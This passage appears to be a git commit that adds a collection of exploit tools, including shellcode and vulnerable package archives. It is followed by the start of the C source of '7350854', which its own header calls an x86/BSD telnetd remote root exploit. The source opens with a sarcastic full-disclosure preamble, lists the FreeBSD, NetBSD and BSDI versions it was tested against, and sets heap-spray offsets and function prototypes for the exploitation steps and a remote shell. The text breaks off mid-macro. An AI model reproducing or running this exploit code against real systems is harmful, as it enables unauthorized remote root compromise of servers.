exploits/7350855-netkit/netkit-telnet-0.16/telnet/network.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/proto.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ptrarray.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/ring.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/sys_bsd.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/sys_bsd.o create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.1 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/telnet.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/terminal.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/tn3270.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/tn3270.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/types.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/utilities.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/utilities.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/authenc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/defs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/ext.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/getent.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/global.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/issue.net.5 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/login.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/logout.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/logwtmp.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/pathnames.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.c create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.16/telnetd/setproctitle.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/slc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/state.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/sys_term.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/t.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/telnetd.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/termstat.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnetd/utility.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/version.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/BUGS create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/ChangeLog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/MCONFIG.in create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/MRULES create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/configure create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/changelog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/control create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/copyright create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/menu create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/prerm create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.17/debian/rules create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.postrm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/debian/telnetd.prerm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/pty-hang.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/README.old create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/TODO create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/array.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/authenc.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/commands.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/defines.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/depend.mk create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/environ.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/environ.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/externs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/fdset.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/general.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/genget.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/genget.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/main.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/netlink.cc create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.17/telnet/netlink.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/network.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/proto.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ptrarray.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ring.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/ring.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/sys_bsd.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/telnet.1 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/telnet.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/terminal.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/terminal.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/tn3270.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/types.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnet/utilities.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/authenc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/defs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/ext.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/getent.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/global.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/issue.net.5 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/login.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/logout.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/logwtmp.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/pathnames.h create mode 100644 
exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.3 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/setproctitle.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/slc.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/state.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/sys_term.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/telnetd.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/termstat.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetd/utility.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/telnetlogin.8 create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/telnetlogin/telnetlogin.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.17/version.h create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16-4potato.1.diff.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16-4potato.1.dsc create mode 100644 exploits/7350855-netkit/netkit-telnet_0.16.orig.tar.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17-14.diff.gz create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17-14.dsc create mode 100644 exploits/7350855-netkit/netkit-telnet_0.17.orig.tar.gz create mode 100644 exploits/7350855-netkit/telnetd-0.16.tgz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/lib/telnetd/login create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/changelog.Debian.gz create mode 100644 
exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/changelog.gz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/doc/telnetd/copyright create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man5/issue.net.5.gz create mode 100644 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man8/in.telnetd.8.gz create mode 120000 exploits/7350855-netkit/telnetd-potato-0.16-4-bin/usr/share/man/man8/telnetd.8.gz create mode 100644 exploits/7350855-netkit/telnetd_0.16-4potato.1.deb create mode 100644 exploits/7350855-netkit/telnetd_0.17-13_i386.deb create mode 100644 exploits/7350855/0/7350somefoo.c create mode 100644 exploits/7350855/0/Makefile create mode 100644 exploits/7350855/0/README create mode 100644 exploits/7350855/0/common.c create mode 100644 exploits/7350855/0/common.h create mode 100644 exploits/7350855/0/network.c create mode 100644 exploits/7350855/0/network.h create mode 100644 exploits/7350855/0/packet.c create mode 100644 exploits/7350855/0/packet.h create mode 100644 exploits/7350855/0/readtest.c create mode 100644 exploits/7350855/0/sniff.c create mode 100644 exploits/7350855/0/sniff.h create mode 100644 exploits/7350855/7350855 create mode 100644 exploits/7350855/7350855-bumped.tar.gz create mode 100644 exploits/7350855/7350855.c create mode 100644 exploits/7350855/7350855_exploit.c create mode 100644 exploits/7350855/Makefile create mode 100644 exploits/7350855/common.c create mode 100644 exploits/7350855/common.h create mode 100644 exploits/7350855/common.o create mode 100644 exploits/7350855/network.c create mode 100644 exploits/7350855/network.h create mode 100644 exploits/7350855/network.o create mode 100644 exploits/7350855/none.tgz create mode 100644 exploits/7350855/packet.c create mode 100644 exploits/7350855/packet.h create mode 100644 exploits/7350855/packet.o create mode 100644 exploits/7350855/readtest create mode 100644 exploits/7350855/readtest.c create 
mode 100644 exploits/7350855/sniff.c create mode 100644 exploits/7350855/sniff.h create mode 100644 exploits/7350855/sniff.o create mode 100644 exploits/7350aio/7350aio.c create mode 100644 exploits/7350bdf/7350bdf.c create mode 100644 exploits/7350hprlpd/7350hprlpd create mode 100644 exploits/7350hprlpd/7350hprlpd.c create mode 100755 exploits/7350hpuke/7350hpuke create mode 100644 exploits/7350hpuke/7350hpuke.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.2.0.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.2.1.c create mode 100644 exploits/7350hpuke/backup/7350hpuke-0.4.0.c create mode 100644 exploits/7350hpuke/proof/proof.txt create mode 100644 exploits/7350hpuke/proof/proof_hpux_ftpd.txt create mode 100644 exploits/7350logout/7350logout create mode 100644 exploits/7350logout/7350logout-0.2.1.c create mode 100644 exploits/7350logout/7350logout.c create mode 100644 exploits/7350logout/irix-6.5-login.c create mode 100644 exploits/7350logout/login-27-x86 create mode 100644 exploits/7350logout/login-ex.c-20020318-morgan create mode 100644 exploits/7350logout/loginex.c create mode 100644 exploits/7350logout/pam.txt create mode 100644 exploits/7350logout/solaris-2.4-sparc-login create mode 100644 exploits/7350logout/solaris-2.6-sparc-login create mode 100644 exploits/7350logout/solaris-2.6-sparc-login2 create mode 100644 exploits/7350logout/solaris-2.7-login.c create mode 100644 exploits/7350logout/solaris-2.8-sparc-login create mode 100644 exploits/7350logout/solaris-2.8-sparc-login-patched create mode 100644 exploits/7350logout/solaris-2.8-sparc-login.o create mode 100644 exploits/7350php/7350php create mode 100644 exploits/7350php/7350php.c create mode 100644 exploits/7350php/Makefile create mode 100644 exploits/7350php/common.c create mode 100644 exploits/7350php/common.h create mode 100644 exploits/7350php/common.o create mode 100644 exploits/7350php/network.c create mode 100644 exploits/7350php/network.h create mode 100644 
exploits/7350php/network.o create mode 100644 exploits/7350rsync/7350rsync.c create mode 100644 exploits/7350squish/7350squish create mode 100644 exploits/7350squish/7350squish-0.1.tar.gz create mode 100644 exploits/7350squish/7350squish.c create mode 100644 exploits/7350squish/7350squish.txt create mode 100644 exploits/7350squish/deb/squid_2.3.4-2_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-1_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-2_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-3_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-4_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.1-5_i386.deb create mode 100644 exploits/7350squish/deb/squid_2.4.2-1_i386.deb create mode 100644 exploits/7350squish/offset-find.sh create mode 100644 exploits/7350squish/tagspace.c create mode 100644 exploits/7350squish/udp.c create mode 100755 exploits/7350wurm/7350wurm create mode 100644 exploits/7350wurm/7350wurm-backup2.c create mode 100644 exploits/7350wurm/7350wurm-backup3.c create mode 100644 exploits/7350wurm/7350wurm-backup4.c create mode 100644 exploits/7350wurm/7350wurm.c create mode 100644 exploits/7350wurm/backup/7350wurm-backup2.c create mode 100644 exploits/7350wurm/backup/7350wurm-old.c create mode 100644 exploits/7350wurm/doc/for-scut.txt create mode 100644 exploits/7350wurm/doc/free.txt create mode 100644 exploits/7350wurm/doc/syn.txt create mode 100644 exploits/7350wurm/doc/synnergy-method.txt create mode 100644 exploits/7350wurm/offset-find.sh create mode 100644 exploits/7350wurm/openbsd-ftpd-linux.txt create mode 100644 exploits/7350wurm/rpm/done/redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm create mode 100644 
exploits/7350wurm/rpm/done/redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse6061update_wuftpd-2.6.0-151.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse62update_wuftpd-2.6.0-121.i386.rpm create mode 100644 exploits/7350wurm/rpm/done/suse70default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse71default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse72default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/done/suse73default_wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm create mode 100644 exploits/7350wurm/rpm/immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/redhat72update_wu-ftpd-2.6.1-20.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse63update_wuftpd-2.6.0-347.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse64update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse70update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse71update_wuftpd-2.6.0-346.i386.rpm create mode 100644 
exploits/7350wurm/rpm/patched/suse72update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/patched/suse73update_wuftpd-2.6.0-344.i386.rpm create mode 100644 exploits/7350wurm/rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm create mode 100644 exploits/7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions create mode 100644 
exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpgroups create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftphosts create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpservers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpusers create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz create mode 100644 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd create mode 120000 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw create mode 120000 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd create mode 100755 exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats create mode 100644 
exploits/7350wurm/shellcode/bambam.s create mode 100644 exploits/7350wurm/shellcode/codedump create mode 100644 exploits/7350wurm/shellcode/codedump.c create mode 100644 exploits/7350wurm/shellcode/pt/Makefile create mode 100644 exploits/7350wurm/shellcode/pt/README create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.c create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.o create mode 100644 exploits/7350wurm/shellcode/pt/x.tar.gz create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit.c create mode 100644 exploits/7350wurm/shellcode/t create mode 100644 exploits/7350wurm/shellcode/t.c create mode 100644 exploits/7350wurm/shellcode/write-read-exec.s create mode 100644 exploits/7350wurm/timoglaser.txt create mode 100644 exploits/ftpd_exp/README create mode 100644 exploits/ftpd_exp/exp.c create mode 100644 exploits/ftpd_exp/exp.py create mode 100755 exploits/ifafoffuffoffaf.c (limited to 'exploits')
diff --git a/exploits/7350854/7350854 b/exploits/7350854/7350854 new file mode 100644
index 0000000..7647d66 Binary files /dev/null and b/exploits/7350854/7350854 differ
diff --git a/exploits/7350854/7350854-r b/exploits/7350854/7350854-r new file mode 100644
index 0000000..87bf289 Binary files /dev/null and b/exploits/7350854/7350854-r differ
diff --git a/exploits/7350854/7350854-r.c b/exploits/7350854/7350854-r.c new file mode 100644
index 0000000..40853ea
--- /dev/null
+++ b/exploits/7350854/7350854-r.c
@@ -0,0 +1,944 @@ + +#ifdef DESPERATION + +Yes, this is the exploit. Yes, fully legal, straight from the authors, this +time. No need to dwelve through archives or ask teenagers to hand it to you. +Just plain and simple. For free. + +No need to worry about copyrights, privacy, about risk and results of your +actions. No need to fear legal prosecution, denial of service attacks or some +bad publicity. Just clean this time. Clean enough to right stick it into the +archive. + +No need to violate something, your moral, your ethics or the rules you live +by. They all stay away from the center of the storm, safely. + +I apologize to everyone I had asked not to disclose this and everyone who was +offended by my postings. Also the ones that send me threatening emails. And +those that pointed out my non conforming behaviour to me. I apologize. + + +Yes, full disclosure works, +Yes, this exploit helps everyone, +Yes, I truly love everyone involved. + +Yes, dear pentester, take it and earn your living in the next pentest using +this code. Enjoy how easy it was, without the need to understand, the need to +know what is happening. Ah, relieving, quite fresh even. Tastes well, nearly +as well as your fresh certificates. And you did not even pay for it, so there +is more for certificates, right? Or buy your little children some new toy, for +it was a hard time the last years, and you wish you would have more time for +them, so show it to them. + +Yes, dear collector, this is an item not to miss. Be sure to get the tagged +and broken versions too, for that your archive would be incomplete without. +And who wants that, an incomplete archive. If you like archiving, you can do +it all the time. Maybe someday you will have the archiving authority then, and +can charge money for it. Or delay things for non paying customers. 
But be sure +to copyright it, else some unethical person might steal your archive and nice +compilation in which you have invested so many hours and investor capital. But +I am sure you will manage this and for this I like you. + +Yes, dear moderator, as you read until now, I have to congratulate you to +having improved your reading skills. Unbelieveable, I jump, enjoying your +newly aquainted capabilities and wish you good luck in the future. After all, +information wants to be free and the sooner one gets over it and apologizes, +the more time is there to drive with the new car in this sunny days. Good +work. + +Yes, dear blackhat, for that you are remaining calm and quiet. For that, I +like you. You do not flame or provocate, you apply your wisdom after all. You +do not advocate, and you have not caused me sleepless nights. That is +something I truly like you for. + +Yes, dear whitehat, your shiny hat blends by enlightning silver colours and I +truly understand what you want to give back with nobel goals. Your bright +shining hat overtones all the unnecessary details and really points to the +important things. This brightens the goal while it shades the rough way. + +Yes, dear script kiddie, I am sorry I caused so much trouble. Just compile it +and start the fun, for that is what exploits are meant to be. And fun, it is +not important to understand things there, its important to enjoy it, right? + +Yes, dear webmaster, we all like your sites and the content. Add this file to +your content and do the humankind good. You have full legal permission to do +so, no need to worry this time. No need to argue, ask or acknowledge. + +Yes, dear author of source code, you have my true respect. You truly made the +internet what it is and I respect your true art of code. + +Yes, dear law, for that most of us respect you. You provide the framework for +social life, for the basic forms of respect in todays commercial minded +livings. 
Sometimes we hate you and sometimes we rely on you. Since you remain +there everytime, it must be our fault. You cannot explain it, but I think I +understand what you mean. + + +Yes, now enjoy the exploit. +No strings attached. + +#endif + +/* 7350854 - x86/bsd telnetd remote root exploit + * + * bug found by scut 2001/06/09 + * further research by smiler, zip, lorian and me. + * thanks to zip's cool friend for giving me a testbed to play on + * + * tested against: BSDI BSD/OS 4.1 + * NetBSD 1.5 + * FreeBSD 3.1 + * FreeBSD 4.0-REL + * FreeBSD 4.2-REL + * FreeBSD 4.3-BETA + * FreeBSD 4.3-STABLE + * FreeBSD 4.3-RELEASE + * + */ + +#define VERSION "0.0.7" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* global variables, uhhohh! + */ +int mode = 16; +int num = 245; +int pop = 31500; /* puts code at 0x08fdff0a */ +int bs = 1; /* buffer start */ + +int num34 = 244; +int pop34 = 71833; /* puts code at 0x0a0d08fe */ +int bs34 = 0; + +int walk; /* populator walker */ +int force = 0; /* force exploitation */ +int checkonly = 0; /* check telnetd only */ + + +void usage (char *progname); +int xp_check (int fd); +void xp_pop (int fd); +void xp_shrinkwin (int fd); +void xp_setenv (int fd, unsigned char *var, unsigned char *val); +void xp (int fd); +void shell (int sock); +void hexdump (char *desc, unsigned char *data, unsigned int amount); + +/* imported from shellkit */ +unsigned long int random_get (unsigned long int low, unsigned long int high); +void random_init (void); +int bad (unsigned char u); +int badstr (unsigned char *code, int code_len, unsigned char *bad, + int bad_len); +unsigned long int x86_nop_rwreg (void); +unsigned long int x86_nop_xfer (char *xferstr); +unsigned int x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + 
